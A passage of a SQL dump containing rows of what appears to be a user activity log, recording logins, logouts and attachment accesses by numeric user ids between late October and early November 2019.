08:31:33','2019-10-30 08:31:33',NULL),(21819,50,'Login',50,'2019-10-30 08:31:58','2019-10-30 08:31:58',NULL),(21820,46,'Login',46,'2019-10-30 09:17:58','2019-10-30 09:17:58',NULL),(21821,61,'Login',61,'2019-10-30 09:46:08','2019-10-30 09:46:08',NULL),(21822,61,'Logout',61,'2019-10-30 09:46:13','2019-10-30 09:46:13',NULL),(21823,50,'Login',50,'2019-10-30 09:46:19','2019-10-30 09:46:19',NULL),(21824,46,'Attachment',416,'2019-10-30 10:35:14','2019-10-30 10:35:14',NULL),(21825,46,'Attachment',419,'2019-10-30 10:35:14','2019-10-30 10:35:14',NULL),(21826,46,'Attachment',288,'2019-10-30 10:35:14','2019-10-30 10:35:14',NULL),(21827,2,'Attachment',757,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21828,2,'Attachment',29,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21829,2,'Attachment',24,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21830,2,'Attachment',416,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21831,2,'Attachment',419,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21832,2,'Attachment',288,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21833,2,'Attachment',181,'2019-10-30 11:12:55','2019-10-30 11:12:55',NULL),(21834,59,'Login',59,'2019-10-30 11:33:21','2019-10-30 11:33:21',NULL),(21835,59,'Attachment',757,'2019-10-30 14:30:22','2019-10-30 14:30:22',NULL),(21836,59,'Attachment',29,'2019-10-30 14:30:22','2019-10-30 14:30:22',NULL),(21837,59,'Attachment',181,'2019-10-30 14:30:22','2019-10-30 14:30:22',NULL),(21838,59,'Attachment',419,'2019-10-30 14:30:22','2019-10-30 14:30:22',NULL),(21839,59,'Attachment',416,'2019-10-30 14:30:23','2019-10-30 14:30:23',NULL),(21840,59,'Attachment',24,'2019-10-30 14:30:23','2019-10-30 14:30:23',NULL),(21841,46,'Attachment',466,'2019-10-30 14:53:58','2019-10-30 14:53:58',NULL),(21842,2,'Attachment',757,'2019-10-31 11:12:06','2019-10-31 11:12:06',NULL),(21843,2,'Attachment',29,'2019-10-31 11:12:06','2019-10-31 11:12:06',NULL),(21844,2,'Attachment',24,'2019-10-31 11:12:06','2019-10-31 11:12:06',NULL),(21845,46,'Login',46,'2019-10-31 14:40:59','2019-10-31 14:40:59',NULL),(21846,46,'Logout',46,'2019-10-31 14:42:46','2019-10-31 14:42:46',NULL),(21847,2,'Attachment',757,'2019-10-31 14:42:47','2019-10-31 14:42:47',NULL),(21848,2,'Attachment',29,'2019-10-31 14:42:47','2019-10-31 14:42:47',NULL),(21849,2,'Attachment',288,'2019-10-31 14:42:47','2019-10-31 14:42:47',NULL),(21850,2,'Attachment',24,'2019-10-31 14:42:47','2019-10-31 14:42:47',NULL),(21851,2,'Attachment',181,'2019-10-31 14:42:47','2019-10-31 14:42:47',NULL),(21852,49,'Login',49,'2019-10-31 14:42:53','2019-10-31 14:42:53',NULL),(21853,2,'Attachment',29,'2019-10-31 14:43:35','2019-10-31 14:43:35',NULL),(21854,2,'Attachment',24,'2019-10-31 14:43:35','2019-10-31 14:43:35',NULL),(21855,2,'Attachment',416,'2019-10-31 14:43:35','2019-10-31 14:43:35',NULL),(21856,2,'Attachment',419,'2019-10-31 14:43:35','2019-10-31 14:43:35',NULL),(21857,2,'Attachment',181,'2019-10-31 14:43:35','2019-10-31 14:43:35',NULL),(21858,59,'Login',59,'2019-10-31 14:43:43','2019-10-31 14:43:43',NULL),(21859,59,'Logout',59,'2019-10-31 14:43:53','2019-10-31 14:43:53',NULL),(21860,2,'Attachment',757,'2019-10-31 14:43:53','2019-10-31 14:43:53',NULL),(21861,49,'Logout',49,'2019-10-31 14:43:54','2019-10-31 14:43:54',NULL),(21862,2,'Attachment',181,'2019-10-31 14:43:55','2019-10-31 14:43:55',NULL),(21863,46,'Login',46,'2019-10-31 14:43:59','2019-10-31 14:43:59',NULL),(21864,49,'Login',49,'2019-10-31 14:44:29','2019-10-31 14:44:29',NULL),(21865,2,'Attachment',757,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21866,2,'Attachment',29,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21867,2,'Attachment',24,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21868,2,'Attachment',416,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21869,2,'Attachment',419,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21870,2,'Attachment',288,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21871,2,'Attachment',181,'2019-10-31 14:45:29','2019-10-31 14:45:29',NULL),(21872,50,'Login',50,'2019-10-31 14:45:43','2019-10-31 14:45:43',NULL),(21873,49,'Logout',49,'2019-10-31 14:46:08','2019-10-31 14:46:08',NULL),(21874,49,'Login',49,'2019-10-31 14:46:17','2019-10-31 14:46:17',NULL),(21875,46,'Logout',46,'2019-10-31 14:47:14','2019-10-31 14:47:14',NULL),(21876,2,'Attachment',757,'2019-10-31 14:47:14','2019-10-31 14:47:14',NULL),(21877,2,'Attachment',24,'2019-10-31 14:47:14','2019-10-31 14:47:14',NULL),(21878,2,'Attachment',29,'2019-10-31 14:47:14','2019-10-31 14:47:14',NULL),(21879,49,'Login',49,'2019-10-31 14:47:23','2019-10-31 14:47:23',NULL),(21880,49,'Logout',49,'2019-10-31 14:48:49','2019-10-31 14:48:49',NULL),(21881,2,'Attachment',757,'2019-10-31 14:48:50','2019-10-31 14:48:50',NULL),(21882,2,'Attachment',29,'2019-10-31 14:48:50','2019-10-31 14:48:50',NULL),(21883,50,'Login',50,'2019-10-31 14:48:55','2019-10-31 14:48:55',NULL),(21884,50,'Logout',50,'2019-10-31 14:48:59','2019-10-31 14:48:59',NULL),(21885,46,'Login',46,'2019-10-31 14:49:03','2019-10-31 14:49:03',NULL),(21886,2,'Attachment',757,'2019-10-31 14:50:17','2019-10-31 14:50:17',NULL),(21887,2,'Attachment',29,'2019-10-31 14:50:17','2019-10-31 14:50:17',NULL),(21888,2,'Attachment',24,'2019-10-31 14:50:17','2019-10-31 14:50:17',NULL),(21889,2,'Attachment',416,'2019-10-31 14:50:18','2019-10-31 14:50:18',NULL),(21890,2,'Attachment',419,'2019-10-31 14:50:18','2019-10-31 14:50:18',NULL),(21891,2,'Attachment',288,'2019-10-31 14:50:18','2019-10-31 14:50:18',NULL),(21892,2,'Attachment',181,'2019-10-31 14:50:18','2019-10-31 14:50:18',NULL),(21893,59,'Login',59,'2019-10-31 15:06:36','2019-10-31 15:06:36',NULL),(21894,2,'Attachment',757,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21895,2,'Attachment',29,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21896,2,'Attachment',24,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21897,2,'Attachment',419,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21898,2,'Attachment',288,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21899,2,'Attachment',181,'2019-10-31 15:11:57','2019-10-31 15:11:57',NULL),(21900,2,'Attachment',541,'2019-10-31 15:11:59','2019-10-31 15:11:59',NULL),(21901,2,'Attachment',539,'2019-10-31 15:11:59','2019-10-31 15:11:59',NULL),(21902,2,'Attachment',538,'2019-10-31 15:11:59','2019-10-31 15:11:59',NULL),(21903,2,'Attachment',535,'2019-10-31 15:11:59','2019-10-31 15:11:59',NULL),(21904,2,'Attachment',403,'2019-10-31 15:11:59','2019-10-31 15:11:59',NULL),(21905,50,'Logout',50,'2019-10-31 15:12:45','2019-10-31 15:12:45',NULL),(21906,61,'Login',61,'2019-10-31 15:13:00','2019-10-31 15:13:00',NULL),(21907,59,'Login',59,'2019-10-31 16:42:39','2019-10-31 16:42:39',NULL),(21908,49,'Login',49,'2019-10-31 16:43:12','2019-10-31 16:43:12',NULL),(21909,61,'Login',61,'2019-10-31 16:43:56','2019-10-31 16:43:56',NULL),(21910,46,'Attachment',872,'2019-10-31 17:20:34','2019-10-31 17:20:34',NULL),(21911,46,'Attachment',872,'2019-10-31 17:21:06','2019-10-31 17:21:06',NULL),(21912,46,'Attachment',872,'2019-10-31 17:21:10','2019-10-31 17:21:10',NULL),(21913,46,'Attachment',872,'2019-10-31 17:21:16','2019-10-31 17:21:16',NULL),(21914,46,'Attachment',872,'2019-10-31 17:21:17','2019-10-31 17:21:17',NULL),(21915,46,'Attachment',872,'2019-10-31 17:21:39','2019-10-31 17:21:39',NULL),(21916,59,'Attachment',872,'2019-10-31 17:22:09','2019-10-31 17:22:09',NULL),(21917,59,'Attachment',872,'2019-10-31 17:22:32','2019-10-31 17:22:32',NULL),(21918,59,'Attachment',873,'2019-10-31 17:22:59','2019-10-31 17:22:59',NULL),(21919,59,'Attachment',872,'2019-10-31 17:23:14','2019-10-31 17:23:14',NULL),(21920,2,'Attachment',181,'2019-10-31 18:51:12','2019-10-31 18:51:12',NULL),(21921,2,'Attachment',29,'2019-10-31 18:51:13','2019-10-31 18:51:13',NULL),(21922,2,'Attachment',419,'2019-10-31 18:51:13','2019-10-31 18:51:13',NULL),(21923,63,'Login',63,'2019-10-31 18:51:19','2019-10-31 18:51:19',NULL),(21924,63,'Attachment',541,'2019-10-31 21:49:25','2019-10-31 21:49:25',NULL),(21925,63,'Attachment',539,'2019-10-31 21:49:25','2019-10-31 21:49:25',NULL),(21926,63,'Attachment',535,'2019-10-31 21:49:25','2019-10-31 21:49:25',NULL),(21927,63,'Attachment',403,'2019-10-31 21:49:25','2019-10-31 21:49:25',NULL),(21928,63,'Attachment',538,'2019-10-31 21:49:25','2019-10-31 21:49:25',NULL),(21929,46,'Login',46,'2019-11-01 08:20:24','2019-11-01 08:20:24',NULL),(21930,46,'Attachment',757,'2019-11-01 08:20:49','2019-11-01 08:20:49',NULL),(21931,46,'Attachment',29,'2019-11-01 08:20:49','2019-11-01 08:20:49',NULL),(21932,46,'Attachment',288,'2019-11-01 08:20:49','2019-11-01 08:20:49',NULL),(21933,46,'Attachment',24,'2019-11-01 08:20:49','2019-11-01 08:20:49',NULL),(21934,46,'Attachment',181,'2019-11-01 08:20:49','2019-11-01 08:20:49',NULL),(21935,50,'Login',50,'2019-11-01 08:40:41','2019-11-01 08:40:41',NULL),(21936,59,'Login',59,'2019-11-01 09:01:41','2019-11-01 09:01:41',NULL),(21937,50,'Login',50,'2019-11-01 10:58:21','2019-11-01 10:58:21',NULL),(21938,46,'Logout',46,'2019-11-01 10:58:43','2019-11-01 10:58:43',NULL),(21939,50,'Login',50,'2019-11-01 10:58:51','2019-11-01 10:58:51',NULL),(21940,50,'Logout',50,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21941,2,'Attachment',757,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21942,2,'Attachment',416,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21943,2,'Attachment',288,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21944,2,'Attachment',24,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21945,2,'Attachment',29,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21946,2,'Attachment',419,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21947,2,'Attachment',181,'2019-11-01 10:58:56','2019-11-01 10:58:56',NULL),(21948,49,'Login',49,'2019-11-01 10:59:04','2019-11-01 10:59:04',NULL),(21949,49,'Logout',49,'2019-11-01 10:59:21','2019-11-01 10:59:21',NULL),(21950,46,'Login',46,'2019-11-01 10:59:26','2019-11-01 10:59:26',NULL),(21951,63,'Login',63,'2019-11-01 11:01:32','2019-11-01 11:01:32',NULL),(21952,63,'Attachment',288,'2019-11-01 11:02:06','2019-11-01 11:02:06',NULL),(21953,63,'Attachment',181,'2019-11-01 11:02:06','2019-11-01 11:02:06',NULL),(21954,49,'Login',49,'2019-11-01 11:03:46','2019-11-01 11:03:46',NULL),(21955,63,'Logout',63,'2019-11-01 11:08:49','2019-11-01 11:08:49',NULL),(21956,64,'Login',64,'2019-11-01 11:09:01','2019-11-01 11:09:01',NULL),(21957,64,'Logout',64,'2019-11-01 11:10:06','2019-11-01 11:10:06',NULL),(21958,65,'Login',65,'2019-11-01 11:10:26','2019-11-01 11:10:26',NULL),(21959,65,'Logout',65,'2019-11-01 11:11:15','2019-11-01 11:11:15',NULL),(21960,66,'Login',66,'2019-11-01 11:11:23','2019-11-01 11:11:23',NULL),(21961,59,'Login',59,'2019-11-01 15:06:19','2019-11-01 15:06:19',NULL),(21962,66,'Logout',66,'2019-11-01 15:10:40','2019-11-01 15:10:40',NULL),(21963,49,'Login',49,'2019-11-01 15:10:54','2019-11-01 15:10:54',NULL),(21964,49,'Logout',49,'2019-11-01 15:20:13','2019-11-01 15:20:13',NULL),(21965,2,'Attachment',416,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21966,2,'Attachment',24,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21967,2,'Attachment',29,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21968,2,'Attachment',757,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21969,2,'Attachment',288,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21970,2,'Attachment',181,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21971,2,'Attachment',419,'2019-11-01 15:20:14','2019-11-01 15:20:14',NULL),(21972,64,'Login',64,'2019-11-01 15:20:32','2019-11-01 15:20:32',NULL),(21973,64,'Logout',64,'2019-11-01 15:36:35','2019-11-01 15:36:35',NULL),(21974,61,'Login',61,'2019-11-01 15:38:20','2019-11-01 15:38:20',NULL),(21975,26,'Login',26,'2019-11-01 15:38:30','2019-11-01 15:38:30',NULL),(21976,26,'Attachment',416,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21977,26,'Attachment',419,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21978,26,'Attachment',29,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21979,26,'Attachment',757,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21980,26,'Attachment',24,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21981,26,'Attachment',288,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21982,26,'Attachment',181,'2019-11-01 15:38:34','2019-11-01 15:38:34',NULL),(21983,61,'Logout',61,'2019-11-01 15:39:27','2019-11-01 15:39:27',NULL),(21984,64,'Login',64,'2019-11-01 15:39:33','2019-11-01 15:39:33',NULL),(21985,64,'Logout',64,'2019-11-01 15:51:29','2019-11-01 15:51:29',NULL),(21986,61,'Login',61,'2019-11-01 15:51:43','2019-11-01 15:51:43',NULL),(21987,61,'Logout',61,'2019-11-01 15:57:24','2019-11-01 15:57:24',NULL),(21988,65,'Login',65,'2019-11-01 15:57:31','2019-11-01 15:57:31',NULL),(21989,65,'Logout',65,'2019-11-01 16:27:12','2019-11-01 16:27:12',NULL),(21990,63,'Login',63,'2019-11-01 16:27:24','2019-11-01 16:27:24',NULL),(21991,63,'Logout',63,'2019-11-01 16:33:59','2019-11-01 16:33:59',NULL),(21992,66,'Login',66,'2019-11-01 16:34:16','2019-11-01 16:34:16',NULL),(21993,66,'Logout',66,'2019-11-01 16:46:59','2019-11-01 16:46:59',NULL),(21994,65,'Login',65,'2019-11-01 16:47:22','2019-11-01 16:47:22',NULL),(21995,2,'Attachment',29,'2019-11-02 10:23:10','2019-11-02 10:23:10',NULL),(21996,2,'Attachment',416,'2019-11-02 10:23:10','2019-11-02 10:23:10',NULL),(21997,2,'Attachment',419,'2019-11-02 10:23:10','2019-11-02 10:23:10',NULL),(21998,2,'Attachment',181,'2019-11-02 10:23:10','2019-11-02 10:23:10',NULL),(21999,52,'Login',52,'2019-11-02 10:23:15','2019-11-02 10:23:15',NULL),(22000,2,'Attachment',416,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22001,2,'Attachment',757,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22002,2,'Attachment',29,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22003,2,'Attachment',24,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22004,2,'Attachment',419,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22005,2,'Attachment',288,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22006,2,'Attachment',181,'2019-11-03 12:08:09','2019-11-03 12:08:09',NULL),(22007,26,'Login',26,'2019-11-03 12:08:26','2019-11-03 12:08:26',NULL),(22008,46,'Login',46,'2019-11-04 08:40:22','2019-11-04 08:40:22',NULL),(22009,49,'Login',49,'2019-11-04 08:41:32','2019-11-04 08:41:32',NULL),(22010,50,'Login',50,'2019-11-04 08:47:04','2019-11-04 08:47:04',NULL),(22011,2,'Attachment',757,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22012,2,'Attachment',29,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22013,2,'Attachment',24,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22014,2,'Attachment',416,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22015,2,'Attachment',419,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22016,2,'Attachment',181,'2019-11-04 10:21:04','2019-11-04 10:21:04',NULL),(22017,2,'Attachment',539,'2019-11-04 10:21:06','2019-11-04 10:21:06',NULL),(22018,2,'Attachment',538,'2019-11-04 10:21:06','2019-11-04 10:21:06',NULL),(22019,2,'Attachment',535,'2019-11-04 10:21:06','2019-11-04 10:21:06',NULL),(22020,2,'Attachment',403,'2019-11-04 10:21:06','2019-11-04 10:21:06',NULL),(22021,2,'Attachment',371,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22022,2,'Attachment',354,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22023,2,'Attachment',180,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22024,2,'Attachment',69,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22025,2,'Attachment',14,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22026,2,'Attachment',36,'2019-11-04 10:21:07','2019-11-04 10:21:07',NULL),(22027,2,'Attachment',757,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22028,2,'Attachment',24,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22029,2,'Attachment',29,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22030,2,'Attachment',416,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22031,2,'Attachment',419,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22032,2,'Attachment',288,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22033,2,'Attachment',181,'2019-11-04 16:04:06','2019-11-04 16:04:06',NULL),(22034,46,'Login',46,'2019-11-04 16:14:56','2019-11-04 16:14:56',NULL),(22035,2,'Attachment',757,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22036,2,'Attachment',29,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22037,2,'Attachment',24,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22038,2,'Attachment',288,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22039,2,'Attachment',416,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22040,2,'Attachment',419,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22041,2,'Attachment',181,'2019-11-04 16:21:06','2019-11-04 16:21:06',NULL),(22042,49,'Login',49,'2019-11-04 16:21:26','2019-11-04 16:21:26',NULL),(22043,49,'Attachment',29,'2019-11-04 16:21:39','2019-11-04 16:21:39',NULL),(22044,2,'Attachment',757,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22045,2,'Attachment',29,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22046,2,'Attachment',24,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22047,2,'Attachment',419,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22048,2,'Attachment',416,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22049,2,'Attachment',288,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22050,2,'Attachment',181,'2019-11-04 16:25:33','2019-11-04 16:25:33',NULL),(22051,46,'Login',46,'2019-11-04 16:26:40','2019-11-04 16:26:40',NULL),(22052,59,'Login',59,'2019-11-04 17:28:45','2019-11-04 17:28:45',NULL),(22053,49,'Login',49,'2019-11-05 08:54:08','2019-11-05 08:54:08',NULL),(22054,49,'Login',49,'2019-11-05 08:54:54','2019-11-05 08:54:54',NULL),(22055,2,'Attachment',757,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22056,2,'Attachment',29,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22057,2,'Attachment',416,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22058,2,'Attachment',24,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22059,2,'Attachment',419,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22060,2,'Attachment',288,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22061,2,'Attachment',181,'2019-11-05 08:56:55','2019-11-05 08:56:55',NULL),(22062,50,'Login',50,'2019-11-05 08:57:05','2019-11-05 08:57:05',NULL),(22063,2,'Attachment',757,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22064,2,'Attachment',416,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22065,2,'Attachment',24,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22066,2,'Attachment',29,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22067,2,'Attachment',419,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22068,2,'Attachment',288,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22069,2,'Attachment',181,'2019-11-05 10:15:30','2019-11-05 10:15:30',NULL),(22070,64,'Login',64,'2019-11-05 10:15:36','2019-11-05 10:15:36',NULL),(22071,49,'Logout',49,'2019-11-05 10:17:33','2019-11-05 10:17:33',NULL),(22072,65,'Login',65,'2019-11-05 10:17:45','2019-11-05 10:17:45',NULL),(22073,63,'Login',63,'2019-11-05 10:18:17','2019-11-05 10:18:17',NULL),(22074,50,'Logout',50,'2019-11-05 10:18:28','2019-11-05 10:18:28',NULL),(22075,66,'Login',66,'2019-11-05 10:18:51','2019-11-05 10:18:51',NULL),(22076,66,'Logout',66,'2019-11-05 10:23:06','2019-11-05 10:23:06',NULL),(22077,50,'Login',50,'2019-11-05 10:23:29','2019-11-05 10:23:29',NULL),(22078,65,'Logout',65,'2019-11-05 10:29:04','2019-11-05 10:29:04',NULL),(22079,49,'Login',49,'2019-11-05 10:29:12','2019-11-05 10:29:12',NULL),(22080,63,'Logout',63,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22081,2,'Attachment',757,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22082,2,'Attachment',29,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22083,2,'Attachment',419,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22084,2,'Attachment',24,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22085,2,'Attachment',416,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22086,2,'Attachment',288,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22087,2,'Attachment',181,'2019-11-05 10:35:52','2019-11-05 10:35:52',NULL),(22088,50,'Login',50,'2019-11-05 10:36:02','2019-11-05 10:36:02',NULL),(22089,50,'Login',50,'2019-11-05 10:37:57','2019-11-05 10:37:57',NULL),(22090,50,'Attachment',512,'2019-11-05 10:53:46','2019-11-05 10:53:46',NULL),(22091,2,'Attachment',512,'2019-11-05 10:53:46','2019-11-05 10:53:46',NULL),(22092,49,'Login',49,'2019-11-05 10:57:38','2019-11-05 10:57:38',NULL),(22093,2,'Attachment',29,'2019-11-05 10:59:59','2019-11-05 10:59:59',NULL),(22094,46,'Login',46,'2019-11-05 11:00:05','2019-11-05 11:00:05',NULL),(22095,2,'Attachment',29,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22096,2,'Attachment',24,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22097,2,'Attachment',757,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22098,2,'Attachment',416,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22099,2,'Attachment',419,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22100,2,'Attachment',288,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22101,2,'Attachment',181,'2019-11-05 11:18:55','2019-11-05 11:18:55',NULL),(22102,2,'Attachment',541,'2019-11-05 11:18:59','2019-11-05 11:18:59',NULL),(22103,2,'Attachment',539,'2019-11-05 11:18:59','2019-11-05 11:18:59',NULL),(22104,2,'Attachment',538,'2019-11-05 11:18:59','2019-11-05 11:18:59',NULL),(22105,2,'Attachment',535,'2019-11-05 11:18:59','2019-11-05 11:18:59',NULL),(22106,2,'Attachment',403,'2019-11-05 11:18:59','2019-11-05 11:18:59',NULL),(22107,50,'Login',50,'2019-11-05 11:32:53','2019-11-05 11:32:53',NULL),(22108,2,'Attachment',29,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22109,2,'Attachment',757,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22110,2,'Attachment',24,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22111,2,'Attachment',288,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22112,2,'Attachment',416,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22113,2,'Attachment',181,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22114,2,'Attachment',419,'2019-11-05 13:22:54','2019-11-05 13:22:54',NULL),(22115,2,'Attachment',29,'2019-11-05 13:49:49','2019-11-05 13:49:49',NULL),(22116,2,'Attachment',181,'2019-11-05 13:49:49','2019-11-05 13:49:49',NULL),(22117,50,'Logout',50,'2019-11-05 13:50:07','2019-11-05 13:50:07',NULL),(22118,53,'Login',53,'2019-11-05 13:50:12','2019-11-05 13:50:12',NULL),(22119,53,'Logout',53,'2019-11-05 14:25:55','2019-11-05 14:25:55',NULL),(22120,50,'Login',50,'2019-11-05 14:26:00','2019-11-05 14:26:00',NULL),(22121,46,'Logout',46,'2019-11-05 15:12:57','2019-11-05 15:12:57',NULL),(22122,2,'Attachment',757,'2019-11-05 15:12:58','2019-11-05 15:12:58',NULL),(22123,2,'Attachment',29,'2019-11-05 15:12:58','2019-11-05 15:12:58',NULL),(22124,2,'Attachment',419,'2019-11-05 15:12:59','2019-11-05 15:12:59',NULL),(22125,2,'Attachment',288,'2019-11-05 15:12:59','2019-11-05 15:12:59',NULL),(22126,2,'Attachment',181,'2019-11-05 15:12:59','2019-11-05 15:12:59',NULL),(22127,49,'Logout',49,'2019-11-05 15:13:10','2019-11-05 15:13:10',NULL),(22128,50,'Attachment',757,'2019-11-05 15:13:22','2019-11-05 15:13:22',NULL),(22129,50,'Attachment',29,'2019-11-05 15:13:22','2019-11-05 15:13:22',NULL),(22130,50,'Logout',50,'2019-11-05 15:13:24','2019-11-05 15:13:24',NULL),(22131,2,'Attachment',29,'2019-11-05 15:13:25','2019-11-05 15:13:25',NULL),(22132,2,'Attachment',24,'2019-11-05 15:13:25','2019-11-05 15:13:25',NULL),(22133,2,'Attachment',419,'2019-11-05 15:13:25','2019-11-05 15:13:25',NULL),(22134,2,'Attachment',416,'2019-11-05 15:13:25','2019-11-05 15:13:25',NULL),(22135,66,'Login',66,'2019-11-05 15:13:41','2019-11-05 15:13:41',NULL),(22136,64,'Login',64,'2019-11-05 15:13:43','2019-11-05 15:13:43',NULL),(22137,65,'Login',65,'2019-11-05 15:14:08','2019-11-05 15:14:08',NULL),(22138,64,'Logout',64,'2019-11-05 15:16:32','2019-11-05 15:16:32',NULL),(22139,63,'Login',63,'2019-11-05 15:16:39','2019-11-05 15:16:39',NULL),(22140,46,'Login',46,'2019-11-05 15:22:15','2019-11-05 15:22:15',NULL),(22141,46,'Logout',46,'2019-11-05 15:26:29','2019-11-05 15:26:29',NULL),(22142,50,'Login',50,'2019-11-05 15:27:01','2019-11-05 15:27:01',NULL),(22143,66,'Logout',66,'2019-11-05 15:33:27','2019-11-05 15:33:27',NULL),(22144,2,'Attachment',757,'2019-11-05 15:33:27','2019-11-05 15:33:27',NULL),(22145,2,'Attachment',29,'2019-11-05 15:33:27','2019-11-05 15:33:27',NULL),(22146,2,'Attachment',24,'2019-11-05 15:33:27','2019-11-05 15:33:27',NULL),(22147,2,'Attachment',416,'2019-11-05 15:33:27','2019-11-05 15:33:27',NULL),(22148,71,'Login',71,'2019-11-05 15:33:37','2019-11-05 15:33:37',NULL),(22149,71,'Logout',71,'2019-11-05 15:36:45','2019-11-05 15:36:45',NULL),(22150,2,'Attachment',757,'2019-11-05 15:36:45','2019-11-05 15:36:45',NULL),(22151,2,'Attachment',419,'2019-11-05 15:36:45','2019-11-05 15:36:45',NULL),(22152,2,'Attachment',288,'2019-11-05 15:36:45','2019-11-05 15:36:45',NULL),(22153,2,'Attachment',181,'2019-11-05 15:36:45','2019-11-05 15:36:45',NULL),(22154,71,'Login',71,'2019-11-05 15:37:42','2019-11-05 15:37:42',NULL),(22155,50,'Attachment',887,'2019-11-05 15:51:48','2019-11-05 